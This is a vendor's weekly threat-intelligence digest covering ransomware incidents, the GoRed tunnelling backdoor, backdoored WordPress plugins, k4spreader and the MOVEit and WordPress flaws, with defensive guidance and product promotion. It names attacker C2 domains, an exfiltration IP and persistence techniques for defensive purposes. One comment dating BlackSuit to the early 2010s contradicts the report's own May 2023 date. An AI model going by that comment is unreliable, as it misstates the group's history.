Vercara’s Open-Source Intelligence (OSINT) Report – June 21 – June 27, 2024

CDK Global outage caused by BlackSuit ransomware attack.  

(TLP: CLEAR) The BlackSuit ransomware gang is responsible for a significant IT outage at CDK Global, disrupting car dealerships across North America. CDK Global, a software-as-a-service provider for car dealership operations, is negotiating with the gang to obtain a decryptor and prevent data leaks. The attack led CDK to shut down its IT systems twice, causing dealerships to resort to manual operations. Major dealerships like Penske Automotive Group and Sonic Automotive have reported disruptions due to the attack. CDK also warns of threat actors posing as CDK agents to gain unauthorized access. BlackSuit, launched in May 2023, is believed to be a rebrand of the Royal ransomware operation, which succeeded the notorious Conti cybercrime syndicate. The Royal ransomware gang, linked to over 350 attacks and $275 million in ransom demands, was identified by the FBI and CISA as using similar tactics and coding overlaps with BlackSuit. 

(TLP: CLEAR) Comments: The BlackSuit group first emerged in the early 2010s and is known for sophisticated hacking operations targeting the financial industry as well as other high-profile organizations throughout the world. The BlackSuit group gained notoriety for its advanced technical capabilities, which include deploying custom malware and conducting highly coordinated cyber-attacks which are aimed at stealing sensitive data and financial assets. BlackSuit’s normal activities include exploiting vulnerabilities in network/systems, utilizing social engineering attacks to include phishing campaigns to introduce their ransomware into their victim’s IT infrastructure.  

(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION” 

“Control:   

“a. Implement [Selection (one or more): signature-based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code;   

“b. Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures;   

“c. Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection; and   

“d. Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.”  

NIST requires malware detection and prevention solutions. This can be on the device, as with anti-virus agents, but also can be augmented by Protective DNS provided by the network that the device is on or across the Internet. This provides defence-in-depth and support for devices such as Internet of Things (IoT) or some servers that cannot run an endpoint client. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations. 

Source: https://www.bleepingcomputer.com/news/security/cdk-global-outage-caused-by-blacksuit-ransomware-attack/  

Change Healthcare lists the medical data stolen in ransomware attack. 

(TLP: CLEAR) UnitedHealth confirmed the types of data stolen in the Change Healthcare ransomware attack, stating that breach notifications will be mailed in July. The attack exposed a vast amount of data, affecting possibly a third of Americans, as per CEO Andrew Witty. Stolen data includes health insurance details, medical records, billing information, and personal identifiers like Social Security numbers. Change Healthcare clarified that data exposure varies per individual and complete medical histories were not stolen. They are notifying affected individuals and offering two years of free credit monitoring and identity theft protection. Impacted individuals can visit changecybersupport.com for more information. The breach stems from a February attack where the BlackCat ransomware gang stole 6 TB of data, causing significant disruptions in the US healthcare system. UnitedHealth paid a $22 million ransom, which was later mishandled by the BlackCat gang, leading to further ransom demands. The breach has cost UnitedHealth $872 million as of April, with further costs expected. 

(TLP: CLEAR) Comments: The healthcare industry continues to be a lucrative target for cybercriminals due to the amount of sensitive data stored within their IT infrastructure. If cybercriminals can exfiltrate sensitive data, they can sell that data on the dark web for significant financial gain. The BlackCat (also known as ALPHV) first emerged in late 2021 and quickly became known for its sophisticated and highly adaptable Ransomware-as-a-Service (RaaS). Unlike other ransomware groups, BlackCat utilizes the Rust coding language, which makes it more resilient and efficient in evading detection. BlackCat targets a wide range of industries (healthcare, education, and critical infrastructure), often demanding substantial ransoms for the decryption of encrypted data and the non-release of stolen data.  

(TLP: CLEAR) Recommended best practices/regulations: Department of Health and Human Services Fact Sheet: Ransomware and The Health Information Portability and Accountability Act (HIPAA): “The HIPAA Security Rule requires implementation of security measures that can help prevent the introduction of malware, including ransomware. Some of these required security measures include:  

“implementing a security management process, which includes conducting a risk analysis to identify threats and vulnerabilities to electronic protected health information (ePHI) and implementing security measures to mitigate or remediate those identified risks;  

“implementing procedures to guard against and detect malicious software;  

“training users on malicious software protection so they can assist in detecting malicious software and know how to report such detections; and  

“implementing access controls to limit access to ePHI to only those persons or software programs requiring access.” 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunnelling to reduce both the quantity and impact of infections. 

Source: https://www.bleepingcomputer.com/news/security/change-healthcare-lists-the-medical-data-stolen-in-ransomware-attack/  

GoRed using DNS & ICMP tunnelling for C2 server communication.  

(TLP: CLEAR) Hackers frequently exploit DNS and ICMP tunnelling to covertly transmit data and bypass network security measures. These protocols, often inadequately blocked by firewalls, can be manipulated to create hidden communication channels for transferring sensitive data or establishing unauthorized access points, allowing threat actors to maintain persistence and avoid detection in compromised networks. Positive Technologies researchers discovered that ExCobalt, a cybercriminal group linked to the notorious Cobalt gang, is using a new tool called GoRed for command-and-control (C2) server communication via DNS and ICMP tunnelling. GoRed, a Go-based backdoor, features a C2 framework for executing commands, credential harvesting, data collection, reconnaissance, data serialization, encryption, archiving, and exfiltration to a dedicated server. GoRed employs multiple communication protocols, including DNS/ICMP tunnelling, WebSocket Secure (WSS), and QUIC. The tool was identified during an incident investigation in March 2024 on a Linux host, with previous sightings in client incidents in July and October 2023. ExCobalt’s C2 servers and domains, such as leo.rpm-bin.link and sula.rpm-bin.link, facilitate communication with compromised systems. GoRed’s control flow relies on command-line interface (CLI) commands to gain system persistence, initialize beacon activities, and monitor the file system. The C2 communication utilizes the RPC protocol with custom CBOR serialization and AES-256-GCM encryption, ensuring secure data transmission. ExCobalt continues to enhance GoRed with new features to improve data collection, maintain secrecy, and exploit vulnerabilities, indicating ongoing advancements in their cyber espionage capabilities. 

(TLP: CLEAR) Comments: DNS and other protocol tunnelling is used to evade detection by advanced malware. It is listed on MITRE ATT&CK as T1071.004, “Application Layer Protocol: DNS”. https://attack.mitre.org/techniques/T1071/004/. Organizations should block outgoing DNS, ICMP, and other ports and protocols commonly used for tunnelling and should only allow outgoing DNS queries from their on-network DNS resolvers. A good resource and process for doing this is described in the CISA Encrypted DNS Implementation Guidance at https://www.cisa.gov/resources-tools/resources/encrypted-dns-implementation-guidance.  

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events.” One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Detection Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), enforces malware filtering as a network service using 4 distinct malware detection engines, including a dynamic decision engine that compares domain details, DNS query details, query answers, and other data points to determine if a domain is malicious before endpoints can be infected by them. 

Source: https://cybersecuritynews.com/gored-dns-icmp-tunneling-c2-communication/  

Multiple WordPress plugins compromised: Hackers create rogue admin accounts. 

(TLP: CLEAR) Multiple WordPress plugins have been backdoored to inject malicious code that makes it possible to create rogue administrator accounts with the aim of performing arbitrary actions. 

“The injected malware attempts to create a new administrative user account and then sends those details back to the attacker-controlled server,” Wordfence security researcher Chloe Chamberland said in a Monday alert. “In addition, it appears the threat actor also injected malicious JavaScript into the footer of websites that appears to add SEO spam throughout the website.” 

The admin accounts have the usernames “Options” and “PluginAuth,” with the account information exfiltrated to the IP address 94[.]156[.]79[.]8. It’s currently not known how the unknown attackers behind the campaign managed to compromise the plugins, but the earliest signs of the software supply chain attack date back to June 21, 2024. The plugins in question are no longer available for download from the WordPress plugin directory pending ongoing review – 

• Social Warfare 4.4.6.4 – 4.4.7.1 (Patched version: 4.4.7.3) – 30,000+ installs 
• Blaze Widget 2.2.5 – 2.5.2 (Patched version: N/A) – 10+ installs 
• Wrapper Link Element 1.0.2 – 1.0.3 (Patched version: N/A) – 1,000+ installs 
• Contact Form 7 Multi-Step Addon 1.0.4 – 1.0.5 (Patched version: N/A) – 700+ installs 
• Simply Show Hooks 1.2.1 (Patched version: N/A) – 4,000+ installs 

Users of the plugins are advised to inspect their sites for suspicious administrator accounts and delete them, in addition to removing any malicious code. 

(TLP: CLEAR) Comments: Malicious actors constantly look for vulnerabilities within web applications to gain access to underlying data. This vulnerability enables malicious actors the ability to create valid administrative accounts that could hide their nefarious actions and make it difficult to identify in log reviews. Organizations should be conducting log reviews of their IT infrastructure at least monthly to identify any anomalies within their network. Additionally, organizations should have a policy in place that alerts network and security personnel when any new accounts are created within the IT infrastructure  

(TLP: CLEAR) Recommended best practices/regulations: OWASP Web Application Firewall: “A ‘web application firewall (WAF)’ is an application firewall for HTTP applications. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection.  

“While proxies generally protect clients, WAFs protect servers. A WAF is deployed to protect a specific web application or set of web applications. A WAF can be considered a reverse proxy.  

“WAFs may come in the form of an appliance, server plugin, or filter and may be customized to an application. The effort to perform this customization can be significant and needs to be maintained as the application is modified.” 

(TLP: CLEAR) Vercara: Vercara’s Web Application Firewall, UltraWAF, can provide you with protection in the way that you need it. UltraWAF allows security postures that assume that all traffic is allowed – except an already identified threat or an attack (negative security) – or zero trust models where all traffic is denied unless explicitly permitted (positive security). 

Source: https://thehackernews.com/2024/06/multiple-wordpress-plugins-compromised.html  

Hackers using k4spreader tool to install DDoS botnet and miners. 

(TLP: CLEAR) A new ELF malware tool named k4spreader, developed by the Chinese “8220” (Water Sigbin) mining gang, was discovered in June 2024. Written in Cgo and packed with a modified UPX packer, k4spreader installs other malware such as the Tsunami DDoS botnet and PwnRig cryptominer. The tool shows persistence, self-update, and download functionalities and has been spreading through vulnerabilities like CVE-2020-14882, JBoss_AS_3456_RCE, and YARN_API_RCE. 

Key Details: 

• Variants and Development: Three variants of k4spreader have been observed, indicating that it is still under development. The latest version (v3) includes enhanced evasion techniques such as logging and runtime port detection. 
• Persistence Methods: K4spreader achieves system persistence through three methods: 

1. Modifying the user’s bash startup file to execute a copied program. 

1. Creating a system service script to run the program in the background. 

1. Creating a systemd service file for the same purpose. 

• Malicious Payloads: It hides malicious programs like Tsunami and PwnRig within its data. Tsunami is an IRC bot used for DDoS attacks, and PwnRig is a Monero cryptocurrency miner. 
• Control Servers: Passive DNS analysis revealed that the C&C servers associated with k4spreader also handle traffic from other shell scripts and mining pools related to the “8220” group. The most active servers include dw.c4kdeliver.top, run.sck-dns.ws, and another unnamed server. 
• Anti-Detection and Maintenance: The malware can disable firewalls, flush iptables rules, clear suspicious processes, remove malicious cron jobs, and log its operations. 

K4spreader is an advanced and evolving malware tool used by the “8220” mining gang to distribute additional malicious software and maintain persistence on infected systems. It exploits known vulnerabilities and employs sophisticated evasion techniques to avoid detection and maintain control over compromised machines. System administrators should be vigilant and monitor for suspicious activities related to this malware. 

(TLP: CLEAR) Comments: The “K4Spreader” is a malicious tool used in cyberattacks to propagate malware within a network and is particularly effective in distributing payloads across systems by leveraging various network protocols and vulnerabilities. This spreader is used to ensure rapid wide dissemination of malware such as ransomware and wipers throughout the network which makes it a critical component in the arsenal of advanced persistent threats (APTs). 

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website categories feeds. 

NIST Cybersecurity Framework (CSF) PR.IR-04: “Adequate resource capacity to ensure availability is maintained.”  Businesses, particularly those located within NATO and allies, should maintain constant vigilance and regularly test and enhance their cybersecurity defensive capabilities, specifically DDoS mitigation strategies, architecture, monitoring, and procedures. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses Cyber Threat Intelligence feeds, domain categories, and other detection engines to assess DNS queries in real-time and block domains that are being used for phishing, malware delivery, and malware Command and Control (C2). This reduces the quantity and impact of malware infections.  

Source: https://cybersecuritynews.com/hackers-k4spreader-ddos-botnet-miners/  

New MOVEit Auth Bypass vulnerability under attack now, patch immediately. 

(TLP: CLEAR) Progress Software’s MOVEit Transfer and MOVEit Cloud-managed file transfer solutions contain a critical authentication bypass vulnerability identified as CVE-2024-5806. This vulnerability, located in the SFTP module, allows attackers to bypass authentication and access sensitive data without proper credentials. Researchers at watchTowr discovered the flaw and published a detailed analysis, revealing that manipulating certain parameters during the SSH authentication process can trick the system into granting access. 

Key Points: 

• Vulnerability Discovery and Exploit Release: The vulnerability was disclosed by watchTowr, and exploit code was publicly released shortly after Progress Software issued a security bulletin. This led to a surge in attack attempts on vulnerable MOVEit installations. 
• Historical Context: Last year, MOVEit Transfer was targeted by the Cl0p ransomware group using a zero-day SQL injection vulnerability, affecting numerous organizations and compromising sensitive data. 
• Patches and Recommendations: Progress Software has released patches for MOVEit Transfer versions 2024.0.2, 2023.1.6, 2023.0.11, and MOVEit Gateway versions 2024.0.1 and later. All customers are strongly advised to apply these patches immediately. 
• Confirmation and Urgency: Researchers at Rapid7 confirmed the exploit and achieved authentication bypass on unpatched versions. Security professionals urge organizations to prioritize this vulnerability, apply vendor-provided updates promptly, and refer to Progress Software’s security bulletin for detailed patching instructions. 

The CVE-2024-5806 vulnerability in MOVEit products is a critical issue that requires immediate attention. Organizations using MOVEit Transfer or MOVEit Cloud should apply the necessary patches without delay to prevent unauthorized access and potential data breaches. 

(TLP: CLEAR) Comments: This is the second critical vulnerability identified in the MOVEit software in the last year. In June 2023, a zero-day vulnerability was identified that allowed malicious actors to execute remote code on effected systems which lead to significant data breaches for over 2,000 organizations which affected more than 60 million individuals globally.  

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”  

By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website category feeds. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), enforces malware filtering as a network service using 4 distinct malware detection engines, including a dynamic decision engine that compares domain details, DNS query details, query answers, and other data points to determine if a domain is malicious before endpoints can be infected by them. 

Source: https://cybersecuritynews.com/moveit-auth-bypass-vulnerability/  

WordPress releases urgent security update to patch XSS and Path Traversal Flaws. 

(TLP: CLEAR) WordPress has released an urgent security update, version 6.5.5, to address critical vulnerabilities that could compromise the security of millions of websites. This minor release includes three bug fixes and is highly recommended for immediate installation to ensure site security and stability. 

Key Security Fixes in WordPress 6.5.5: 

• Cross-Site Scripting (XSS) Vulnerability in HTML API: 

1. Reported by Dennis Snell, Alex Concha, and Grzegorz Ziółkowski of the WordPress security team. 

1. This vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users. 

• Cross-Site Scripting (XSS) Vulnerability in Template Part Block: 

1. Independently reported by Rafie Muhammad of Patchstack and identified during a third-party security audit. 

1. This flaw could enable attackers to execute arbitrary scripts in the context of the user’s session. 

• Path Traversal Issue on Windows-Hosted Sites: 

1. Reported by Rafie M & Edouard L of Patchstack, David Fifield, x89, apple502j, and mishre. 

1. This vulnerability could allow attackers to access restricted directories and files on the server, potentially leading to data breaches or further exploitation. 

Update Instructions: 

• Download from WordPress.org: Visit the official WordPress website to download the latest version. 
• Update via WordPress Dashboard: Navigate to the Dashboard, click on “Updates,” and then click “Update Now.” 
• Automatic Background Updates: For sites that support automatic updates, the process will begin automatically. 

Given the severity of these vulnerabilities, it is crucial for all WordPress site administrators to update their installations immediately. Delaying updates can expose sites to potential attacks, leading to data loss, unauthorized access, and other security breaches. WordPress 6.5.5 is a short-cycle release, with the next major release, version 6.6, scheduled for July 16, 2024. This upcoming release is expected to bring significant improvements and new features, enhancing the platform’s functionality and user experience. 

(TLP: CLEAR) Comments: Cross-Site Scripting (XSS) occurs when a malicious actor is able in inject malicious code/script into trusted websites. This vulnerability is more than likely a stored (persistent) XSS vulnerability where malicious code/scripts are injected directly into a web application’s stored data which is then served to users whenever they access the affected content.  

(TLP: CLEAR) Recommended best practices/regulations: OWASP Web Application Firewall: “A ‘web application firewall (WAF)’ is an application firewall for HTTP applications. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection.  

“While proxies generally protect clients, WAFs protect servers. A WAF is deployed to protect a specific web application or set of web applications. A WAF can be considered a reverse proxy.  

“WAFs may come in the form of an appliance, server plugin, or filter and may be customized to an application. The effort to perform this customization can be significant and needs to be maintained as the application is modified.” 

(TLP: CLEAR) Vercara: Vercara’s Web Application Firewall, UltraWAF, provides protection at the application layer to detect and block DDoS attacks but also unwanted web bots and application attacks such as SQLi, XSS, and CSRF. 

Source: https://cybersecuritynews.com/wordpress-releases-urgent-security-update/